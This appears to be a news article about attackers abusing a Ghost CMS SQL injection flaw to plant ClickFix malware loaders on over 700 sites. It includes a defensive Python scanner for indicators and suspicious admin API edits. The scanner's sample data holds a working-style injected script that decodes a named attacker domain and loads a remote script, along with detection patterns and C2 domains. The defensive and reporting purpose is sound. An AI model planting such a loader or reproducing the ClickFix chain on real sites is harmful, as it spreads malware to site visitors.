May 28, 2026

Threat actors have seized control of more than 700 websites powered by Ghost CMS. They did so by exploiting a critical SQL injection vulnerability patched months earlier. The attacks inject malicious JavaScript that feeds visitors into ClickFix social engineering schemes. These schemes trick users on Windows machines into pasting commands that download and run malware.

The vulnerability, tracked as CVE-2026-26980, carries a CVSS score of 9.4. It affects Ghost versions from 3.24.0 through 6.19.0. An unauthenticated attacker can read arbitrary data from the site’s database. That includes the admin API key. XLab at Qianxin first spotted the campaign targeting one of its clients on May 7, 2026. What began as a single incident quickly revealed a mass compromise operation.

Attackers don’t stop at theft. They use the stolen admin API key to call the Ghost Admin API. Specifically, they issue PUT requests to /ghost/api/admin/posts/:id/, which lets them edit articles in bulk. They append a lightweight JavaScript loader at the bottom of pages. The loader fetches a more sophisticated cloaking script from attacker-controlled domains such as clo4shara.xyz. That script fingerprints the visitor’s browser environment. It checks WebGL, navigator properties, timezone, touch support and console behavior among other signals.

Based on the fingerprint the cloaking service decides what to serve next. Often it delivers an iframe that loads a counterfeit Cloudflare human verification page. The fake page from domains like cloud-verification.com tells the visitor they must complete a step to proceed. It instructs them to press Windows key plus R to open the Run dialog or directly open Command Prompt. Then it provides text that the user is urged to copy and paste with Ctrl plus V before hitting Enter.

The pasted command typically follows the same pattern: it downloads a zip file, extracts it and executes a batch script or DLL. One observed update.bat runs PowerShell quietly to fetch installer.dll from a Storj share link, then launches it with rundll32. The DLL in turn reaches out for additional payloads. These have included information stealers, remote access tools and even Electron-based executables. Some variants open a YouTube video in the background to distract the victim while the malware installs.

But the scale stands out. Bleeping Computer reported that compromised properties include university sites from Harvard, Oxford and Auburn as well as DuckDuckGo’s official blog. Other victims span AI and machine learning platforms, blockchain projects, SaaS companies, media outlets, fintech services and personal blogs. The trust users place in these legitimate domains boosts the success rate of the ClickFix lures. Visitors assume the verification step comes from the site itself.

And the campaign shows signs of competition. XLab researchers observed at least two separate threat groups racing to poison the same vulnerable instances. Some sites were hit by both groups within a single day. One group updated its payload on May 16 with a new installer.dll that evaded initial detection. The second wave of infections pushed the total past 700 domains. “We have cumulatively identified more than 700 domains that have been contaminated, including several globally renowned sites,” the XLab team stated in its analysis.

The flaw itself was discovered with help from Anthropic’s Claude AI model according to The Hacker News. Ghost developers released the fix in version 6.19.1 on February 19, 2026. That gave site operators more than two months to update before active exploitation began in earnest. Many did not. Ghost CMS runs on over 57,000 websites worldwide. It powers properties for organizations such as 404 Media, the Canadian government and Duolingo. The open-source platform’s popularity makes the unpatched population a rich target.

Once injected the malicious script uses techniques designed to run only once per visitor. Newer variants store state in localStorage to avoid repeated execution on the same device. The loader decodes a base64 string containing the command-and-control URL. It appends query parameters and sets an ID based on the page origin before dynamically adding a script tag. This two-stage design allows operators to swap out the final payload without touching the compromised sites again. They simply update what the cloaking service returns.

ClickFix as a technique has gained traction in recent years. It avoids traditional drive-by downloads or exploit kits. Instead it counts on users following instructions that feel like routine troubleshooting. The fake pages mimic real services with convincing copy, logos and even Ray IDs. Some prompts claim a connection issue or a need to review security before proceeding. The social engineering works particularly well on enterprise and academic users who may be conditioned to follow IT instructions.

Security teams have seen similar campaigns abuse compromised WordPress sites and other CMS platforms. Yet the Ghost incidents highlight a persistent problem. Even critical vulnerabilities with available patches go unaddressed for weeks or months. In this case the window between patch release and mass exploitation allowed attackers to scan the internet for vulnerable Ghost instances, extract keys and inject code at scale.

Remediation requires more than simply updating the CMS. Administrators must rotate all API keys, both admin and content variants, as well as admin passwords and active sessions. They should scan their database and article content for indicators such as references to ghost_once_footer_, atob combined with appendChild, or specific base64 strings tied to known command-and-control domains. Bulk removal of matching script tags is necessary. Logs for admin API calls should be retained for at least 30 days and reviewed for suspicious PUT requests to post endpoints around the time of the known attack waves.
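The two checks in that paragraph, scanning post content for the loader's indicators and reviewing admin API logs for PUT requests to post endpoints, can be scripted. The block below is an added example written for this page; it is not code from the article, from XLab, or from the Ghost project. It assumes a nginx-style "combined" access log in front of Ghost, an attack window running from the May 7 first sighting to an assumed review cutoff of May 17, and constructed sample posts and log lines; the two C2 domains are the ones named in the article. The base64 check goes one step beyond a literal string match: because a domain encodes differently depending on its byte offset inside the encoded URL, the scanner matches all three alignments.

```python
"""Added example (not from the article, Ghost, or XLab): defender-side checks
for the remediation steps above.  scan_post_html() looks for the injection
indicators the article names (ghost_once_footer_, atob() paired with
appendChild, and base64 forms of the known C2 domains) in one post's HTML;
suspicious_admin_puts() pulls PUT requests to admin post endpoints out of an
access log for the attack window.  Log format, sample posts and sample log
lines are constructed here; the domains come from the article."""
import base64
import re
from datetime import datetime, timezone

KNOWN_C2_DOMAINS = ["clo4shara.xyz", "cloud-verification.com"]  # named in the article


def base64_fragments(domain: str) -> list[str]:
    """Return the three base64 spellings of `domain`, one per byte alignment.

    A string inside a base64 blob encodes differently depending on its byte
    offset modulo 3, so a literal match on one spelling misses the other two.
    Only characters that depend solely on the domain's own bytes are kept, so
    each fragment is stable whatever precedes or follows the domain."""
    raw = domain.encode()
    frags = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + raw).decode().rstrip("=")
        start = (4 * pad + 2) // 3          # first char fully inside the domain
        end = (4 * (pad + len(raw))) // 3   # one past the last such char
        frags.append(enc[start:end])
    return frags


def scan_post_html(html: str) -> list[str]:
    """Return the indicator names found in one post's HTML (empty if clean)."""
    hits = []
    if "ghost_once_footer_" in html:               # once-per-device localStorage key
        hits.append("ghost_once_footer_")
    if "atob(" in html and "appendChild" in html:  # decode C2 URL, then inject a script tag
        hits.append("atob+appendChild")
    for domain in KNOWN_C2_DOMAINS:
        if domain in html or any(f in html for f in base64_fragments(domain)):
            hits.append(f"c2:{domain}")
    return hits


# Assumed: nginx "combined" access-log format in front of Ghost.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
ADMIN_POSTS_PATH = re.compile(r"^/ghost/api/admin/posts/[^/?]+/?(\?.*)?$")


def suspicious_admin_puts(log_text: str, window_start: datetime, window_end: datetime):
    """Return (timestamp, client_ip, path, status) for every PUT to an admin
    post endpoint whose timestamp falls inside [window_start, window_end]."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method != "PUT" or not ADMIN_POSTS_PATH.match(path):
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if window_start <= when <= window_end:
            hits.append((when.isoformat(), ip, path, int(status)))
    return hits


# Constructed sample data.  The injected post mirrors the loader shape the
# article describes (once-per-device guard, base64 C2 URL, appended script tag).
C2_URL_B64 = base64.b64encode(b"https://clo4shara.xyz/s.js").decode()
CLEAN_POST = "<p>Welcome to the blog.</p><script>console.log('analytics ok')</script>"
INJECTED_POST = (
    "<p>Welcome to the blog.</p>"
    "<script>if(!localStorage.getItem('ghost_once_footer_a1')){"
    "localStorage.setItem('ghost_once_footer_a1','1');"
    f"var u=atob('{C2_URL_B64}')+'?id='+btoa(location.origin);"
    "var s=document.createElement('script');s.src=u;document.body.appendChild(s);}"
    "</script>"
)
ATTACK_WINDOW = (datetime(2026, 5, 7, tzinfo=timezone.utc),   # first sighting (article)
                 datetime(2026, 5, 17, tzinfo=timezone.utc))  # assumed end of review window
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [16/May/2026:03:12:44 +0000] "PUT /ghost/api/admin/posts/64a1f0c2e9b3/ HTTP/1.1" 200 1532 "-" "-"
203.0.113.5 - - [16/May/2026:03:12:45 +0000] "PUT /ghost/api/admin/posts/7b02d1aa4c10/ HTTP/1.1" 200 1498 "-" "-"
198.51.100.7 - - [16/May/2026:09:01:10 +0000] "GET /ghost/api/admin/posts/64a1f0c2e9b3/ HTTP/1.1" 200 1532 "-" "-"
192.0.2.9 - - [30/Apr/2026:14:20:00 +0000] "PUT /ghost/api/admin/posts/7b02d1aa4c10/ HTTP/1.1" 200 1498 "-" "-"
"""

if __name__ == "__main__":
    for name, html in (("clean", CLEAN_POST), ("injected", INJECTED_POST)):
        print(name, scan_post_html(html))
    for hit in suspicious_admin_puts(SAMPLE_ACCESS_LOG, *ATTACK_WINDOW):
        print("review:", *hit)
```

In practice scan_post_html would be run over every row of the posts table (the html and plaintext columns) from a database export, and suspicious_admin_puts over the full 30 days of retained logs; a burst of PUTs to many post ids within seconds from one client, as in the constructed sample, is the bulk-edit pattern worth pulling for review.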

TechRadar emphasized the need for urgent upgrades to Ghost 6.19.1 or newer along with close monitoring of those 30-day admin API logs. XLab strongly recommended that all Ghost users complete system upgrades and perform self-inspection and remediation. The researchers noted that the vast majority of their notifications to affected site owners had received no response so far.

Newer reporting from today underscores the ongoing risk. Malwarebytes Labs detailed how the injected JavaScript turns education and technology sites into distribution points for the same ClickFix chains. The campaign continues to evolve with operators refining their cloaking and payload delivery to stay ahead of detection.

Site operators running Ghost should treat this as an active intrusion campaign rather than a theoretical vulnerability. The presence of the loader script does not always trigger obvious breakage. Pages continue to load normally for most visitors. Only those who trigger the fingerprint match see the fake verification prompt. That stealth helps the compromised sites remain useful to attackers for weeks.

The incident also raises questions about discovery methods. That Anthropic’s Claude model helped uncover the original flaw points to growing reliance on AI-assisted code review in open-source projects. Yet it equally shows that even well-maintained platforms can ship critical logic errors in their API layers. The Content API endpoint apparently failed to sanitize inputs properly when handling certain filter or query parameters, opening the door to database extraction.

For organizations whose sites were hit the next steps are clear but tedious. Restore from clean backups where possible. Otherwise surgically remove the injected scripts at the database level. Change every credential. Notify downstream users who may have visited during the compromise window and advise them to scan their Windows systems for the known payloads. And update immediately to the latest Ghost release.

This episode serves as a reminder. Patching critical vulnerabilities in content management systems cannot wait. When those systems host content trusted by thousands of daily visitors the consequences stretch far beyond a defaced blog post. They reach into the endpoints of students, researchers, developers and professionals who simply wanted to read an article. The attackers counted on that trust. So far it appears many of them succeeded.

Ghost CMS Breach Exposes 700 Sites to ClickFix Malware via Unpatched SQL Flaw first appeared on Web and IT News.
